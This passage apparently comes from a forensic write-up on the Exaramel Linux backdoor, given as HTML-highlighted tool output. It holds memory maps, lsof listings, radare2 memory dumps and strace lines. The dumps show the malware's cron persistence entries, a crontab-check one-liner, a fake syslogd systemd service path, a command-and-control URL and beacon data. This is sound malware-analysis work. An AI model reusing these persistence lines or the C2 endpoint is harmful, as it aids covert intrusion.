<li class="li1"><div class="de1"><span class="nu0">00649000</span><span class="sy0">-</span>007f6000 r<span class="co1">--p 00249000 08:01 397381 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /test/Exaramel</span></div></li>
<li class="li1"><div class="de1">007f6000<span class="sy0">-</span><span class="nu0">00826000</span> rw<span class="sy0">-</span>p 003f6000 <span class="nu0">08</span><span class="sy0">:</span><span class="nu0">01</span> <span class="nu0">397381</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1"><span class="nu0">00826000</span><span class="sy0">-</span><span class="nu0">00849000</span> rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">c000000000<span class="sy0">-</span>c000001000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">c41fff8000<span class="sy0">-</span>c420100000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">7f32836ed000<span class="sy0">-</span>7f328378d000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">7fff6fc00000<span class="sy0">-</span>7fff6fc21000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>stack<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">7fff6fdb9000<span class="sy0">-</span>7fff6fdba000 r<span class="sy0">-</span>xp <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>vdso<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">ffffffffff600000<span class="sy0">-</span>ffffffffff601000 r<span class="sy0">-</span>xp <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span> &nbsp;<span class="br0">&#91;</span>vsyscall<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;cwd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp;<span class="nu0">397369</span> <span class="sy0">/</span>test</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;rtd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp; &nbsp; &nbsp; <span class="nu0">2</span> <span class="sy0">/</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;txt &nbsp; &nbsp;REG &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp;<span class="nu0">6469139</span> &nbsp;<span class="nu0">397381</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;0u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;1u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;2u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;3u &nbsp;unix <span class="nu0">0xffff88000f2c6480</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6334</span> <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;4u &nbsp;<span class="nu0">0000</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span> &nbsp; &nbsp;<span class="nu0">1203</span> anon_inode</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;5r &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">1</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">1210</span> <span class="sy0">/</span>dev<span class="sy0">/</span>urandom</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;6r &nbsp;FIFO &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">8</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6350</span> pipe</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;8r &nbsp;FIFO &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">8</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6351</span> pipe</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;cwd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp;<span class="nu0">397369</span> <span class="sy0">/</span>test</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;rtd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp; &nbsp; &nbsp; <span class="nu0">2</span> <span class="sy0">/</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;txt &nbsp; &nbsp;REG &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp;<span class="nu0">6469139</span> &nbsp;<span class="nu0">397381</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;0u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;1u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;2u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;3u &nbsp;unix <span class="nu0">0xffff88000f2c6480</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6334</span> <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;4u &nbsp;<span class="nu0">0000</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span> &nbsp; &nbsp;<span class="nu0">1203</span> anon_inode</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;5r &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">1</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">1210</span> <span class="sy0">/</span>dev<span class="sy0">/</span>urandom</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;6r &nbsp;IPv4 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">6424</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; TCP $LOCAL<span class="sy0">:</span><span class="nu0">34573</span><span class="sy0">-&gt;</span>176<span class="sy0">.</span>31<span class="sy0">.</span>225<span class="sy0">.</span>204<span class="sy0">:</span><span class="nu0">443</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;cwd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp;<span class="nu0">397369</span> <span class="sy0">/</span>test</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;rtd &nbsp; &nbsp;DIR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp; &nbsp; <span class="nu0">4096</span> &nbsp; &nbsp; &nbsp; <span class="nu0">2</span> <span class="sy0">/</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp;txt &nbsp; &nbsp;REG &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">8</span><span class="sy0">,</span><span class="nu0">1</span> &nbsp;<span class="nu0">6469139</span> &nbsp;<span class="nu0">397381</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;0u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;1u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;2u &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">136</span><span class="sy0">,</span><span class="nu0">0</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp; &nbsp; <span class="nu0">3</span> <span class="sy0">/</span>dev<span class="sy0">/</span>pts<span class="sy0">/</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;3u &nbsp;unix <span class="nu0">0xffff88000f2c6480</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">6334</span> <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;4u &nbsp;<span class="nu0">0000</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0</span> &nbsp; &nbsp;<span class="nu0">1203</span> anon_inode</div></li>
<li class="li1"><div class="de1">Exaramel &nbsp; &nbsp;5r &nbsp; CHR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">1</span><span class="sy0">,</span><span class="nu0">9</span> &nbsp; &nbsp; &nbsp;0t0 &nbsp; &nbsp;<span class="nu0">1210</span> <span class="sy0">/</span>dev<span class="sy0">/</span>urandom</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> Live radare2 forensics <span class="br0">&#40;</span>before<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6440</span> <span class="nu0">2304</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> pxx @ obj<span class="sy0">.</span>runtime<span class="sy0">.</span>enoptrbss<span class="sy0">+</span><span class="nu0">528867392</span> <span class="sy0">#</span> <span class="nu0">0xc4200a6440</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">-</span> offset <span class="sy0">-</span> &nbsp; &nbsp; 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6440</span> &nbsp;Access<span class="sy0">-</span>Control<span class="sy0">-</span>Allow<span class="sy0">-</span>Origin<span class="sy0">.....</span>Content<span class="sy0">-</span>Disposition<span class="sy0">.............</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6480</span> &nbsp;If<span class="sy0">-</span>Unmodified<span class="sy0">-</span>Since<span class="sy0">.............</span>Proxy<span class="sy0">-</span>Authenticate<span class="sy0">..............</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a64c0</span> &nbsp;Proxy<span class="sy0">-</span>Authorization<span class="sy0">.............</span>Strict<span class="sy0">-</span>Transport<span class="sy0">-</span>Security<span class="sy0">.......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6500</span> &nbsp;Transfer<span class="sy0">-</span>Encoding<span class="sy0">...............</span>config<span class="sy0">.</span>json<span class="sy0">.....................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6540</span> &nbsp;<span class="sy0">..</span>m<span class="sy0">...............</span>m<span class="sy0">...............</span>m<span class="sy0">.....................</span>`<span class="sy0">..</span> <span class="sy0">....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a6580</span> &nbsp;listen unix <span class="sy0">/</span>tmp<span class="sy0">/.</span>applock<span class="sy0">.......</span>bind<span class="sy0">:</span> address already <span class="kw2">in</span> use<span class="sy0">....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200a65c0</span> &nbsp;App has already started!<span class="sy0">.......................................</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> Live radare2 forensics <span class="br0">&#40;</span>after<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ed90</span> &nbsp;Authorization<span class="sy0">...</span>Content<span class="sy0">-</span>EncodingContent<span class="sy0">-</span>LocationContent<span class="sy0">-</span>Range<span class="sy0">...</span>Expect<span class="sy0">..</span>If<span class="sy0">-</span>MatchLinkMax<span class="sy0">-</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ede8</span> &nbsp;ForwardsRangeReferer<span class="sy0">....</span>RefreshTrailer<span class="sy0">..</span>Retry<span class="sy0">-</span>After<span class="sy0">.....</span>Vary100101102200Www<span class="sy0">-</span>Authenticate</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ee40</span> &nbsp;201202203204205<span class="sy0">.</span>206207208226300<span class="sy0">.</span>301302303304305<span class="sy0">.</span>307308400401402<span class="sy0">.</span>403404405406407<span class="sy0">.</span>40840941</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ee98</span> &nbsp;0411412<span class="sy0">.</span>413414415416417<span class="sy0">.</span>418422423424426<span class="sy0">.</span>428429431451500<span class="sy0">.</span>501502503504505<span class="sy0">.</span>506507508510511<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000eef0</span> &nbsp;$<span class="sy0">.</span>m<span class="sy0">.............</span>j6n<span class="sy0">.....</span>&amp;<span class="sy0">.........</span>m<span class="sy0">..............</span>!n<span class="sy0">..............</span>bn<span class="sy0">.....</span><span class="nu0">4</span><span class="sy0">.........</span>m<span class="sy0">.....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000ef48</span> &nbsp;<span class="sy0">......../</span>test<span class="sy0">/</span>`<span class="sy0">........</span> E<span class="sy0">.</span> <span class="sy0">..../</span>tmp<span class="sy0">/.</span>applock<span class="sy0">............................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000efa0</span> &nbsp;rH<span class="sy0">..*.</span>E?<span class="sy0">.</span><span class="br0">&#91;</span><span class="sy0">......</span>&amp;<span class="sy0">.............../</span>dev<span class="sy0">/</span>urandom<span class="sy0">............</span>@<span class="sy0">..</span> <span class="sy0">............................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000eff8</span> &nbsp;<span class="sy0">................................</span>Hosts<span class="sy0">...................</span>Proxy<span class="sy0">...................</span>Version<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f050</span> &nbsp;<span class="sy0">................</span>Guid<span class="sy0">....................</span>Next<span class="sy0">....................</span>Datetime<span class="sy0">................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f0a8</span> &nbsp;Timeout<span class="sy0">.................</span>Def<span class="sy0">.............................................................</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f408</span> &nbsp;<span class="sy0">/</span>bin<span class="sy0">/</span>sh<span class="sy0">................./</span>bin<span class="sy0">/</span>sh<span class="sy0">.-</span>c<span class="sy0">......</span>SHELL<span class="sy0">=/</span>bin<span class="sy0">/</span>bash<span class="sy0">.</span>TERM<span class="sy0">=</span>vt100<span class="sy0">......</span>HUSHLOGIN<span class="sy0">=</span>FALSE<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f460</span> &nbsp;USER<span class="sy0">=</span>nyan_apt<span class="sy0">....</span>SHLVL<span class="sy0">=</span><span class="nu0">1</span><span class="sy0">.........</span>HOME<span class="sy0">=/</span>test<span class="sy0">.</span>LOGNAME<span class="sy0">=</span>test<span class="sy0">.......</span>_<span class="sy0">=./</span>Exaramel<span class="sy0">...</span><span class="nu0">1</span><span class="sy0">.</span>m<span class="sy0">.......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f4b8</span> &nbsp;<span class="sy0">........</span>`<span class="sy0">..........</span> <span class="sy0">....</span>`<span class="sy0">..........</span> <span class="sy0">..../</span>dev<span class="sy0">/</span>null<span class="sy0">..........</span> <span class="sy0">.......</span> <span class="sy0">....................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f510</span> &nbsp;<span class="sy0">/</span>bin<span class="sy0">/</span>sh<span class="sy0">./</span>bin<span class="sy0">/</span>sh<span class="sy0">.-</span>c<span class="sy0">.</span>whoami<span class="sy0">.......</span>SHELL<span class="sy0">=/</span>bin<span class="sy0">/</span>bash<span class="sy0">.</span>TERM<span class="sy0">=</span>vt100<span class="sy0">......</span>HUSHLOGIN<span class="sy0">=</span>FALSE<span class="sy0">.</span>USER<span class="sy0">=</span>nyan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f568</span> &nbsp;_apt<span class="sy0">.....</span>SHLVL<span class="sy0">=</span><span class="nu0">1</span><span class="sy0">.</span>mung<span class="sy0">....</span>HOME<span class="sy0">=/</span>test<span class="sy0">..</span>LOGNAME<span class="sy0">=</span>test<span class="sy0">....</span>_<span class="sy0">=./</span>Exaramel<span class="sy0">........</span>test<span class="sy0">../</span>bin<span class="sy0">/</span>uname</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f5c0</span> &nbsp;`<span class="sy0">.</span>m<span class="sy0">............./</span>usr<span class="sy0">/</span>bin<span class="sy0">/</span>uname<span class="sy0">../</span>usr<span class="sy0">/</span>bin<span class="sy0">/</span>uname<span class="sy0">../</span>bin<span class="sy0">/</span>uname<span class="sy0">......</span>`<span class="sy0">..........</span> <span class="sy0">....</span>`<span class="sy0">.......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f618</span> &nbsp;<span class="sy0">...</span> <span class="sy0">..../</span>dev<span class="sy0">/</span>null<span class="sy0">..........</span> <span class="sy0">.......</span> <span class="sy0">............</span>uname<span class="sy0">.................../</span>bin<span class="sy0">/</span>uname<span class="sy0">......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f670</span> &nbsp;<span class="sy0">-</span>a<span class="sy0">.</span>TERM<span class="sy0">=</span>vt100<span class="sy0">...</span>SHELL<span class="sy0">=/</span>bin<span class="sy0">/</span>bash<span class="sy0">.</span>HUSHLOGIN<span class="sy0">=</span>FALSE<span class="sy0">.</span>USER<span class="sy0">=</span>test<span class="sy0">....</span>SHLVL<span class="sy0">=</span><span class="nu0">1</span><span class="sy0">.</span>nyan_apt<span class="sy0">%</span>0A<span class="sy0">.</span>HOME<span class="sy0">=/</span>te</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f6c8</span> &nbsp;st<span class="sy0">.</span>LOGNAME<span class="sy0">=</span>test<span class="sy0">....</span>_<span class="sy0">=./</span>Exaramel<span class="sy0">..........</span>`<span class="sy0">.....</span>@<span class="sy0">..</span> <span class="sy0">.......</span> <span class="sy0">....</span>$<span class="sy0">..........</span> <span class="sy0">.............</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42000f720</span> &nbsp;P<span class="sy0">..</span> <span class="sy0">....</span>I<span class="sy0">.........</span>m<span class="sy0">...............</span>m<span class="sy0">...........</span>nyan_apt<span class="sy0">%</span>0A<span class="sy0">...............................</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004a36f</span> &nbsp;<span class="sy0">.*/</span><span class="nu0">1</span> <span class="sy0">*</span> <span class="sy0">*</span> <span class="sy0">*</span> <span class="sy0">*</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel<span class="sy0">.</span>@reboot <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel<span class="sy0">.</span><span class="kw4">true</span><span class="sy0">.................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004a4cf</span> &nbsp;<span class="sy0">..</span>`<span class="sy0">.</span> <span class="sy0">............................................</span>Linux xxxxxxxxxxxxxxxxxxxxxxxxxx <span class="sy0">#</span><span class="nu0">1</span> SMP</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004a527</span> &nbsp; xxxxxxxxxxxxxxxxxxxxxx GNU<span class="sy0">/</span>Linux<span class="sy0">.......................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42004c660</span> &nbsp;<span class="br0">&#40;</span>crontab <span class="sy0">-</span>l <span class="nu0">2</span><span class="sy0">&gt;/</span>dev<span class="sy0">/</span>null<span class="br0">&#41;</span> | grep <span class="sy0">//</span>test<span class="sy0">/</span>Exaramel &amp;&amp; echo <span class="st0">'true'</span> || echo <span class="st0">'false'</span><span class="sy0">.........</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc420053148</span> &nbsp;<span class="sy0">........................................................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200531a0</span> &nbsp;<span class="sy0">/</span>etc<span class="sy0">/</span>systemd<span class="sy0">/</span>system<span class="sy0">/</span>syslogd<span class="sy0">.</span>service<span class="sy0">.....................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200531f8</span> &nbsp;<span class="sy0">........................................................................................</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200533d3</span> &nbsp;<span class="sy0">........................................................................................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc42005342b</span> &nbsp;<span class="sy0">.....................</span>https<span class="sy0">://</span>176<span class="sy0">.</span>31<span class="sy0">.</span>225<span class="sy0">.</span>204<span class="sy0">/</span>api<span class="sy0">/</span>v1<span class="sy0">/</span>auth<span class="sy0">/</span>app<span class="sy0">.............................</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc420053483</span> &nbsp; <span class="sy0">.............................</span>q`<span class="sy0">........</span> <span class="sy0">...............................................</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc4200551e0</span> &nbsp;generation<span class="sy0">=</span><span class="nu0">1</span>&amp;guid<span class="sy0">=</span>7248d60f<span class="sy0">-</span>2a8f<span class="sy0">-</span><span class="nu0">453f</span><span class="sy0">-</span>ac5b<span class="sy0">-</span>19f5e0d7a3b0&amp;platform<span class="sy0">=</span>Linux<span class="sy0">+</span>xxxxxxxxxxxxxxxxx</div></li>
<li class="li1"><div class="de1"><span class="nu0">0xc420055238</span> &nbsp;xxxxxxx<span class="sy0">+%</span><span class="nu0">231</span><span class="sy0">+</span>SMP<span class="sy0">+</span>xxxxxxxxxxxxxx<span class="sy0">+</span>x86_64<span class="sy0">+</span>GNU<span class="sy0">%</span>2FLinux<span class="sy0">%</span>0A&amp;version<span class="sy0">=</span><span class="nu0">1</span>&amp;whoami<span class="sy0">=</span>nyan_apt<span class="sy0">%</span>0A<span class="sy0">.....</span> </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> crontab tampering artifact</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">munmap<span class="br0">&#40;</span><span class="nu0">0x7f75952fb000</span><span class="sy0">,</span> <span class="nu0">4096</span><span class="br0">&#41;</span> &nbsp; &nbsp; &nbsp;<span class="sy0">=</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">socket<span class="br0">&#40;</span>PF_FILE<span class="sy0">,</span> SOCK_DGRAM|SOCK_CLOEXEC<span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">3</span></div></li>
<li class="li1"><div class="de1">connect<span class="br0">&#40;</span><span class="nu0">3</span><span class="sy0">,</span> <span class="br0">&#123;</span>sa_family<span class="sy0">=</span>AF_FILE<span class="sy0">,</span> path<span class="sy0">=</span><span class="st0">&quot;/dev/log&quot;</span><span class="br0">&#125;</span><span class="sy0">,</span> <span class="nu0">110</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span></div></li>
